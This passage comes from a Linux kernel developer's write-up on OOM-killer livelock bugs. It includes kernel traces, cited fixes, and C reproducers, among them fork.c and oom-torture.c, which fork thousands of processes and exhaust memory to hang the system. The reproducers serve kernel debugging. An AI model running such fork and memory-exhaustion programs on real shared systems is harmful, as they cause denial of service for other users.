[  480.496918]  [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0
(Notice that "Out of memory: Kill process" line is not yet printed despite 7 minutes has elapsed after "invoked oom-killer:" line is printed.)
---------- Example output end ----------

October 2015  The OOM killer cannot be invoked due to vmstat_update work not executed

Allocating/releasing memory are very vert frequently occurring operations. Also, since Linux is designed to be able to run on systems with only one CPU to thousands of CPUs. If we use global variables and update with exclusion control in order to track memory usage (vmstat), it will cause significant performance penalty. Therefore, in order to avoid performance problem, memory usage is maintained per CPU basis, and is synchronized periodically or as needed basis. And, vmstat_update work request is sent to system_wq workquewue upon periodic synchronization.

But when the system_wq workqueue is processing some other work request, that workqueue cannot process vmstat_update work request. As a result, when some work request is doing memory allocation, memory usage is forever never updated because vmstat_update work request cannot be processed, but the in-flight allocation request forever sees outdated memory usage and forever retries due to the "too small to fail" memory-allocation rule. As a result, the system enters into infinite loop without being able to invoke the OOM killer.

---------- Example output start ----------
[  271.579276] MemAlloc: kworker/0:56(7399) gfp=0x2400000 order=0 delay=129294
[  271.581237]  ffff88007c78fa08 ffff8800778f8c80 ffff88007c790000 ffff8800778f8c80
[  271.583329]  0000000002400000 0000000000000000 ffff8800778f8c80 ffff88007c78fa20
[  271.585391]  ffffffff8162aa9d 0000000000000001 ffff88007c78fa30 ffffffff8162aac7
[  271.587463] Call Trace:
[  271.588512]  [<ffffffff8162aa9d>] preempt_schedule_common+0x18/0x2b
[  271.590243]  [<ffffffff8162aac7>] _cond_resched+0x17/0x20
[  271.591830]  [<ffffffff8111fafe>] __alloc_pages_nodemask+0x64e/0xcc0
[  271.593561]  [<ffffffff8116a3b2>] ? __kmalloc+0x22/0x190
[  271.595119]  [<ffffffff81160ce7>] alloc_pages_current+0x87/0x110
[  271.596778]  [<ffffffff812e95f4>] bio_copy_kern+0xc4/0x180
[  271.598342]  [<ffffffff810a6a00>] ? wait_woken+0x80/0x80
[  271.599878]  [<ffffffff812f25f0>] blk_rq_map_kern+0x70/0x130
[  271.601481]  [<ffffffff812ece35>] ? blk_get_request+0x75/0xe0
[  271.603100]  [<ffffffff814433fd>] scsi_execute+0x12d/0x160
[  271.604657]  [<ffffffff81443524>] scsi_execute_req_flags+0x84/0xf0
[  271.606339]  [<ffffffffa01db742>] sr_check_events+0xb2/0x2a0 [sr_mod]
[  271.608141]  [<ffffffff8109cbfc>] ? set_next_entity+0x6c/0x6a0
[  271.609830]  [<ffffffffa01cf163>] cdrom_check_events+0x13/0x30 [cdrom]
[  271.611610]  [<ffffffffa01dbb85>] sr_block_check_events+0x25/0x30 [sr_mod]
[  271.613429]  [<ffffffff812fc7eb>] disk_check_events+0x5b/0x150
[  271.615065]  [<ffffffff812fc8f1>] disk_events_workfn+0x11/0x20
[  271.616699]  [<ffffffff810827c5>] process_one_work+0x135/0x310
[  271.618321]  [<ffffffff81082abb>] worker_thread+0x11b/0x4a0
[  271.620018]  [<ffffffff810829a0>] ? process_one_work+0x310/0x310
[  271.622022]  [<ffffffff81087e53>] kthread+0xd3/0xf0
[  271.623533]  [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0
[  271.625487]  [<ffffffff8162f09f>] ret_from_fork+0x3f/0x70
[  271.627175]  [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0
---------- Example output end ----------

The output above by kmallocwd reports a situation that a workqueue which is doing GFP_NOIO memory allocation request is retrying for so far 129 seconds. Judging from my experience of reproducing various OOM livelock situations, the system is presumably already in OOM livelock situation if disk_events_workfn() function keeps calling __alloc_pages_nodemask() function and waiting for more unlikely helps. (The reason I wrote "A drive recognized as /dev/sr0" at Target environments is that the management task for CD-ROM drive shall periodically issue GFP_NOIO memory allocation request so that we can obtain traces like shown above.)

This situation is the similar cause with unable to invoke the OOM killer using SysRq-f. It is difficult to imagine the behavior when all workqueues working like handyman became busy. If each work item is assigned a dedicated workqueue, we would be able to avoid "never processed forever" problem, but at the same time we are wasting resources.

Since we cannot leave this problem unresolved, a dedicated workqueue for vmstat work item was assigned. In particular, commit 373ccbe5927034b5 ("mm, vmstat: allow WQ concurrency to discover memory reclaim doesn't make any progress"), commit 751e5f5c753e8d44 ("vmstat: allocate vmstat_wq before it is used") and commit 564e81a57f9788b1 ("mm, vmstat: fix wrong WQ sleep when memory reclaim doesn't make any progress") are applied. Note that this problem affects RHEL 6/7.

December 2015  Feedback in OOM detection rework was too optimistic

This is a problem which was discovered at the same time with abovementioned vmstat_update problem. In order to avoid OOM livelock situation, judgement for whether to retry the allocation request before invoking the OOM killer was modified to be stricter in stages. While testing the modification, it turned out that the OOM killer is trivially and prematurely invoked, even without memory pressure, by simply repeating file I/O.

---------- fileio2.c ----------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>

int main(int argc, char *argv[])
{
        int i;
        static char buffer[4096];
        signal(SIGCHLD, SIG_IGN);
        for (i = 0; i < 2; i++) {
                int fd;
                int j;
                snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i);
                fd = open(buffer, O_RDWR | O_CREAT, 0600);
                memset(buffer, 0, sizeof(buffer));
                for (j = 0; j < 1048576 * 1000 / 4096; j++) /* 1000 is MemTotal / 2 */
                        write(fd, buffer, sizeof(buffer));
                close(fd);
        }
        for (i = 0; i < 2; i++) {
                if (fork() == 0) {
                        int fd;
                        snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i);
                        fd = open(buffer, O_RDWR);
                        memset(buffer, 0, sizeof(buffer));
                        while (fd != EOF) {
                                lseek(fd, 0, SEEK_SET);
                                while (read(fd, buffer, sizeof(buffer)) == sizeof(buffer));
                        }
                        _exit(0);
                }
        }
        if (fork() == 0) {
                execl("./fork", "./fork", NULL);
                _exit(1);
        }
        if (fork() == 0) {
                sleep(1);
                execl("./fork", "./fork", NULL);
                _exit(1);
        }
        while (1)
                system("pidof fork | wc");
        return 0;
}
---------- fileio2.c ----------
---------- fork.c ----------
#include <unistd.h>
#include <signal.h>

int main(int argc, char *argv[])
{
        int i;
        signal(SIGCHLD, SIG_IGN);
        while (1) {
                sleep(5);
                for (i = 0; i < 2000; i++) {
                        if (fork() == 0) {
                                sleep(3);
                                _exit(0);
                        }
                }
        }
}
---------- fork.c ----------
---------- Example output start ----------
[  277.863985] Node 0 DMA32 free:20128kB min:5564kB low:6952kB high:8344kB active_anon:108332kB inactive_anon:8252kB active_file:985160kB inactive_file:615436kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5904kB shmem:8524kB slab_reclaimable:52088kB slab_unreclaimable:59748kB kernel_stack:31280kB pagetables:55708kB unstable:0kB bounce:0kB free_pcp:1056kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  277.884512] Node 0 DMA32: 3438*4kB (UME) 791*8kB (UME) 3*16kB (UM) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20128kB
[  291.331040] Node 0 DMA32 free:29500kB min:5564kB low:6952kB high:8344kB active_anon:126756kB inactive_anon:8252kB active_file:821500kB inactive_file:604016kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:12684kB shmem:8524kB slab_reclaimable:56808kB slab_unreclaimable:99804kB kernel_stack:58448kB pagetables:92552kB unstable:0kB bounce:0kB free_pcp:2004kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  291.349097] Node 0 DMA32: 4221*4kB (UME) 1971*8kB (UME) 436*16kB (UME) 141*32kB (UME) 8*64kB (UM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44652kB
[  302.897985] Node 0 DMA32 free:28240kB min:5564kB low:6952kB high:8344kB active_anon:79344kB inactive_anon:8248kB active_file:1016568kB inactive_file:604696kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:80kB writeback:0kB mapped:13004kB shmem:8520kB slab_reclaimable:52076kB slab_unreclaimable:64064kB kernel_stack:35168kB pagetables:48552kB unstable:0kB bounce:0kB free_pcp:1384kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  302.916334] Node 0 DMA32: 4304*4kB (UM) 1181*8kB (UME) 59*16kB (UME) 7*32kB (ME) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 27832kB
[  311.014501] Node 0 DMA32 free:22820kB min:5564kB low:6952kB high:8344kB active_anon:56852kB inactive_anon:11976kB active_file:1142936kB inactive_file:582040kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:160kB writeback:0kB mapped:10796kB shmem:16640kB slab_reclaimable:48608kB slab_unreclaimable:41912kB kernel_stack:16560kB pagetables:30876kB unstable:0kB bounce:0kB free_pcp:948kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:128 all_unreclaimable? no
[  311.034251] Node 0 DMA32: 6*4kB (U) 2401*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 19232kB
[  314.293371] Node 0 DMA32 free:15244kB min:5564kB low:6952kB high:8344kB active_anon:82496kB inactive_anon:11976kB active_file:1110984kB inactive_file:467400kB unevictable:0kB isolated(anon):0kB isolated(file):88kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:9440kB shmem:16640kB slab_reclaimable:53684kB slab_unreclaimable:72536kB kernel_stack:40048kB pagetables:67672kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:12 all_unreclaimable? no
[  314.314336] Node 0 DMA32: 1180*4kB (UM) 1449*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16312kB
[  322.774181] Node 0 DMA32 free:19780kB min:5564kB low:6952kB high:8344kB active_anon:68264kB inactive_anon:17816kB active_file:1155724kB inactive_file:470216kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:8kB writeback:0kB mapped:9744kB shmem:24708kB slab_reclaimable:52540kB slab_unreclaimable:63216kB kernel_stack:32464kB pagetables:51856kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  322.796256] Node 0 DMA32: 86*4kB (UME) 2474*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20136kB
[  330.804341] Node 0 DMA32 free:22076kB min:5564kB low:6952kB high:8344kB active_anon:47616kB inactive_anon:17816kB active_file:1063272kB inactive_file:685848kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:216kB writeback:0kB mapped:9708kB shmem:24708kB slab_reclaimable:48536kB slab_unreclaimable:36844kB kernel_stack:12048kB pagetables:25992kB unstable:0kB bounce:0kB free_pcp:776kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  330.826190] Node 0 DMA32: 1637*4kB (UM) 1354*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17380kB
[  332.828224] Node 0 DMA32 free:15544kB min:5564kB low:6952kB high:8344kB active_anon:63184kB inactive_anon:17784kB active_file:1215752kB inactive_file:468872kB unevictable:0kB isolated(anon):0kB isolated(file):68kB present:2080640kB managed:2021100kB mlocked:0kB dirty:312kB writeback:0kB mapped:9116kB shmem:24708kB slab_reclaimable:49912kB slab_unreclaimable:50068kB kernel_stack:21600kB pagetables:42384kB unstable:0kB bounce:0kB free_pcp:1364kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  332.846805] Node 0 DMA32: 4108*4kB (UME) 897*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 23608kB
[  341.054731] Node 0 DMA32 free:20512kB min:5564kB low:6952kB high:8344kB active_anon:76796kB inactive_anon:23792kB active_file:1053836kB inactive_file:618588kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1656kB writeback:0kB mapped:19768kB shmem:32784kB slab_reclaimable:49000kB slab_unreclaimable:47636kB kernel_stack:21664kB pagetables:37188kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  341.073722] Node 0 DMA32: 3309*4kB (UM) 1124*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22228kB
[  360.075472] Node 0 DMA32 free:17856kB min:5564kB low:6952kB high:8344kB active_anon:117872kB inactive_anon:25588kB active_file:1022532kB inactive_file:466856kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:420kB writeback:0kB mapped:25300kB shmem:40976kB slab_reclaimable:57804kB slab_unreclaimable:79416kB kernel_stack:46784kB pagetables:78044kB unstable:0kB bounce:0kB free_pcp:1100kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  360.093794] Node 0 DMA32: 2719*4kB (UM) 97*8kB (UM) 14*16kB (UM) 37*32kB (UME) 27*64kB (UME) 3*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15172kB
[  368.853099] Node 0 DMA32 free:22524kB min:5564kB low:6952kB high:8344kB active_anon:79156kB inactive_anon:24876kB active_file:872972kB inactive_file:738900kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:25708kB shmem:40976kB slab_reclaimable:50820kB slab_unreclaimable:62880kB kernel_stack:32048kB pagetables:49656kB unstable:0kB bounce:0kB free_pcp:524kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  368.871173] Node 0 DMA32: 5042*4kB (UM) 248*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22152kB
[  379.261759] Node 0 DMA32 free:15888kB min:5564kB low:6952kB high:8344kB active_anon:89928kB inactive_anon:23780kB active_file:1295512kB inactive_file:358284kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1608kB writeback:0kB mapped:25376kB shmem:40976kB slab_reclaimable:47972kB slab_unreclaimable:50848kB kernel_stack:22320kB pagetables:42360kB unstable:0kB bounce:0kB free_pcp:248kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  379.279344] Node 0 DMA32: 2994*4kB (ME) 503*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16000kB
[  387.367409] Node 0 DMA32 free:15320kB min:5564kB low:6952kB high:8344kB active_anon:76364kB inactive_anon:28712kB active_file:1061180kB inactive_file:596956kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:20kB writeback:0kB mapped:27700kB shmem:49168kB slab_reclaimable:51236kB slab_unreclaimable:51096kB kernel_stack:22912kB pagetables:40920kB unstable:0kB bounce:0kB free_pcp:700kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  387.385740] Node 0 DMA32: 3638*4kB (UM) 115*8kB (UM) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15488kB
[  391.207543] Node 0 DMA32 free:15224kB min:5564kB low:6952kB high:8344kB active_anon:115956kB inactive_anon:28392kB active_file:1117532kB inactive_file:359656kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:29348kB shmem:49168kB slab_reclaimable:56028kB slab_unreclaimable:85168kB kernel_stack:48592kB pagetables:81620kB unstable:0kB bounce:0kB free_pcp:1124kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:356 all_unreclaimable? no
[  391.228084] Node 0 DMA32: 3374*4kB (UME) 221*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15264kB
[  395.663881] Node 0 DMA32 free:12820kB min:5564kB low:6952kB high:8344kB active_anon:98924kB inactive_anon:27520kB active_file:1105780kB inactive_file:494760kB unevictable:0kB isolated(anon):4kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1412kB writeback:12kB mapped:29588kB shmem:49168kB slab_reclaimable:49836kB slab_unreclaimable:60524kB kernel_stack:32176kB pagetables:50356kB unstable:0kB bounce:0kB free_pcp:1500kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:388 all_unreclaimable? no
[  395.683137] Node 0 DMA32: 3794*4kB (ME) 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15176kB
[  399.871655] Node 0 DMA32 free:18432kB min:5564kB low:6952kB high:8344kB active_anon:99156kB inactive_anon:26780kB active_file:1150532kB inactive_file:408872kB unevictable:0kB isolated(anon):68kB isolated(file):80kB present:2080640kB managed:2021100kB mlocked:0kB dirty:3492kB writeback:0kB mapped:30924kB shmem:49168kB slab_reclaimable:54236kB slab_unreclaimable:68184kB kernel_stack:37392kB pagetables:63708kB unstable:0kB bounce:0kB free_pcp:784kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  399.890082] Node 0 DMA32: 4155*4kB (UME) 200*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 18220kB
[  408.447006] Node 0 DMA32 free:12684kB min:5564kB low:6952kB high:8344kB active_anon:74296kB inactive_anon:25960kB active_file:1086404kB inactive_file:605660kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:264kB writeback:0kB mapped:30604kB shmem:49168kB slab_reclaimable:50200kB slab_unreclaimable:45212kB kernel_stack:19184kB pagetables:34500kB unstable:0kB bounce:0kB free_pcp:740kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  408.465169] Node 0 DMA32: 2804*4kB (ME) 203*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 12840kB
[  416.426931] Node 0 DMA32 free:15396kB min:5564kB low:6952kB high:8344kB active_anon:98836kB inactive_anon:32120kB active_file:964808kB inactive_file:666224kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:33628kB shmem:57332kB slab_reclaimable:51048kB slab_unreclaimable:51824kB kernel_stack:23328kB pagetables:41896kB unstable:0kB bounce:0kB free_pcp:988kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  416.447247] Node 0 DMA32: 5158*4kB (UME) 68*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 21176kB
[  418.780159] Node 0 DMA32 free:8876kB min:5564kB low:6952kB high:8344kB active_anon:86544kB inactive_anon:31516kB active_file:965016kB inactive_file:654444kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:8408kB shmem:57332kB slab_reclaimable:48856kB slab_unreclaimable:61116kB kernel_stack:30224kB pagetables:48636kB unstable:0kB bounce:0kB free_pcp:980kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:260 all_unreclaimable? no
[  418.799643] Node 0 DMA32: 3093*4kB (UME) 1043*8kB (UME) 2*16kB (M) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20748kB
[  428.087913] Node 0 DMA32 free:22760kB min:5564kB low:6952kB high:8344kB active_anon:94544kB inactive_anon:38936kB active_file:1013576kB inactive_file:564976kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:36096kB shmem:65376kB slab_reclaimable:52196kB slab_unreclaimable:60576kB kernel_stack:29888kB pagetables:56364kB unstable:0kB bounce:0kB free_pcp:852kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  428.109005] Node 0 DMA32: 2943*4kB (UME) 458*8kB (UME) 20*16kB (UME) 11*32kB (UME) 11*64kB (ME) 4*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17324kB
[  439.014180] Node 0 DMA32 free:11232kB min:5564kB low:6952kB high:8344kB active_anon:82868kB inactive_anon:38872kB active_file:1189912kB inactive_file:439592kB unevictable:0kB isolated(anon):12kB isolated(file):40kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:1152kB mapped:35948kB shmem:65376kB slab_reclaimable:51224kB slab_unreclaimable:56664kB kernel_stack:27696kB pagetables:43180kB unstable:0kB bounce:0kB free_pcp:380kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  439.032446] Node 0 DMA32: 2761*4kB (UM) 28*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 11268kB
[  441.731001] Node 0 DMA32 free:15056kB min:5564kB low:6952kB high:8344kB active_anon:90532kB inactive_anon:42716kB active_file:1204248kB inactive_file:377196kB unevictable:0kB isolated(anon):12kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5552kB shmem:73568kB slab_reclaimable:52956kB slab_unreclaimable:68304kB kernel_stack:39936kB pagetables:47472kB unstable:0kB bounce:0kB free_pcp:624kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  441.731018] Node 0 DMA32: 3130*4kB (UM) 338*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15224kB
[  442.070851] Node 0 DMA32 free:8852kB min:5564kB low:6952kB high:8344kB active_anon:90412kB inactive_anon:42664kB active_file:1179304kB inactive_file:371316kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5544kB shmem:73568kB slab_reclaimable:55136kB slab_unreclaimable:80080kB kernel_stack:55456kB pagetables:52692kB unstable:0kB bounce:0kB free_pcp:312kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:348 all_unreclaimable? no
[  442.070867] Node 0 DMA32: 590*4kB (ME) 827*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 8976kB
[  442.245192] Node 0 DMA32 free:10832kB min:5564kB low:6952kB high:8344kB active_anon:97756kB inactive_anon:42664kB active_file:1082048kB inactive_file:417012kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5248kB shmem:73568kB slab_reclaimable:62816kB slab_unreclaimable:88964kB kernel_stack:61408kB pagetables:62908kB unstable:0kB bounce:0kB free_pcp:696kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  442.245208] Node 0 DMA32: 1902*4kB (UME) 410*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 10888kB
---------- Example output end ----------

Since this problem was discovered, we concluded that we need more testings, and the modification was not sent to initially targeted Linux 4.6. Then, a lot of testings are done, and we concluded that we can obtain reasonable results, and the modification was sent to Linux 4.7.

Currently we are in the step whether it works well without side effects. But since nobody actively tests behavior under memory pressure, I can't deny the possibility of finding unexpected side effects after this change is included into enterprise Linux distributions.

Incidentally, a few hours before the modification was merged to linux.git, Oleg Nesterov reported a problem that The system enters into OOM livelock situation due to retry logic by zone_reclaimable(). The problem should be already solved by the modification, but I was surprised to see the reproducer Oleg posted.

Mercy! Oleg reported that the problem can be reproduced by repeatedly running the reproducer shown below on a system with one CPU. It is a contrast to my multi-threaded reproducers which I developed with trial and error in order to intentionally reproduce almost OOM situation.

---------- oleg's-test.c ----------
#include <stdlib.h>
#include <string.h>

int main(void)
{
        for (;;) {
                void *p = malloc(1024 * 1024);
                memset(p, 0, 1024 * 1024);
        }
}
---------- oleg's-test.c ----------

···we can't predict in which situations a problem caused by memory management pops up.

February 2016  All memory allocation requests get stuck at the same time

The OOM detection rework got long discussion as with the OOM reaper, but that is too difficult for me to understand. But I introduce one unresolved problem which was discovered while testing the OOM detection rework.

Linux 2.6.32 and later includes commit 35cd78156c499ef8 ("vmscan: throttle direct reclaim when too many pages are isolated already") in order to avoid premature invocation of the OOM killer. But that patch did not suppose a situation where kswapd kernel thread which reclaims memory asynchronously is blocked at locks which are acquired while reclaiming memory. As a result, an infinite loop where all threads doing memory allocation requests wait for kswapd forever, and the system enters into OOM livelock situation without invoking the OOM killer.

---------- oom-torture.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>

static char use_delay = 0;

static void sigcld_handler(int unused)
{
        use_delay = 1;
}

int main(int argc, char *argv[])
{
        static char buffer[4096] = { };
        char *buf = NULL;
        unsigned long size;
        int i;
        signal(SIGCLD, sigcld_handler);
        for (i = 0; i < 1024; i++) {
                if (fork() == 0) {
                        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1000", 4);
                        close(fd);
                        sleep(1);
                        if (!i)
                                pause();
                        snprintf(buffer, sizeof(buffer), "/tmp/file.%u", getpid());
                        fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600);
                        while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer)) {
                                poll(NULL, 0, 10);
                                fsync(fd);
                        }
                        _exit(0);
                }
        }
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(2);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096) {
                buf[i] = 0;
                if (use_delay) /* Give children a chance to write(). */
                        poll(NULL, 0, 10);
        }
        pause();
        return 0;
}
---------- oom-torture.c ----------
---------- Example output start ----------
[ 1096.700789] systemd invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0
[ 1096.708751] systemd cpuset=/ mems_allowed=0
[ 1096.712519] CPU: 2 PID: 1 Comm: systemd Not tainted 4.7.0-rc7+ #55
[ 1096.717463] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 1096.725553]  0000000000000286 0000000006e33503 ffff88003faef998 ffffffff812d727d
[ 1096.731302]  0000000000000000 ffff88003faefbb0 ffff88003faefa38 ffffffff811c5944
[ 1096.736956]  0000000000000206 ffffffff8182b870 ffff88003faef9d8 ffffffff810c0ef9
[ 1096.742600] Call Trace:
[ 1096.744916]  [<ffffffff812d727d>] dump_stack+0x85/0xc8
[ 1096.749276]  [<ffffffff811c5944>] dump_header+0x5b/0x3a8
[ 1096.753708]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1096.758659]  [<ffffffff810c0fcd>] ? trace_hardirqs_on+0xd/0x10
[ 1096.763176]  [<ffffffff81626e45>] ? _raw_spin_unlock_irqrestore+0x45/0x80
[ 1096.768275]  [<ffffffff8114eda8>] oom_kill_process+0x388/0x520
[ 1096.772759]  [<ffffffff8114f51f>] out_of_memory+0x58f/0x5e0
[ 1096.777101]  [<ffffffff8114f180>] ? out_of_memory+0x1f0/0x5e0
[ 1096.781511]  [<ffffffff8115447f>] __alloc_pages_nodemask+0xeff/0xf70
[ 1096.786612]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1096.791221]  [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160
[ 1096.796023]  [<ffffffff8114cf5f>] filemap_fault+0x45f/0x670
[ 1096.800329]  [<ffffffff8114ce30>] ? filemap_fault+0x330/0x670
[ 1096.804672]  [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs]
[ 1096.809332]  [<ffffffff81176e71>] __do_fault+0x71/0x140
[ 1096.813331]  [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30
[ 1096.817750]  [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560
